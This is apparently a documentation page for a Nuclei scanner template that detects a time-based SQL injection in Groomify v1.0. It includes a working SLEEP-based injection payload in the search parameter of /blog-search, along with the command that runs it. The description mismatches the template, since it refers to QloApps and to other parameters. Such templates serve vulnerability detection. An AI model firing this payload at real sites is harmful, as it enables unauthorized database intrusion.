Skip to content

Groomify v1.0 - SQL Injection Vulnerability

ID: groomify-sqli

Severity: high

Author: theamanrawat

Tags: time-based-sqli,sqli,groomify,unauth

An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application’s authentication and authorization mechanisms and retrieve the contents of an entire database.

id: groomify-sqli
info:
name: Groomify v1.0 - SQL Injection Vulnerability
author: theamanrawat
severity: high
description: |
An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.
reference:
- https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
- https://vulners.com/zdt/1337DAY-ID-38799
metadata:
verified: "true"
max-request: 1
tags: time-based-sqli,sqli,groomify,unauth
http:
- raw:
- |
@timeout: 25s
GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "text/html")
- contains(body, 'value=\"deneme')
condition: and
# digest: 4a0a00473045022038a03f30f9660ff6dd3aa26b6475b4cf5feb123f5a3af53f7686d6e89d4e47c3022100ecc30df0f30e2364d5bca2e6f06c15bf614b5df3a494dc5e8fa21875f46a6cde:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/groomify-sqli.yaml"

View on Github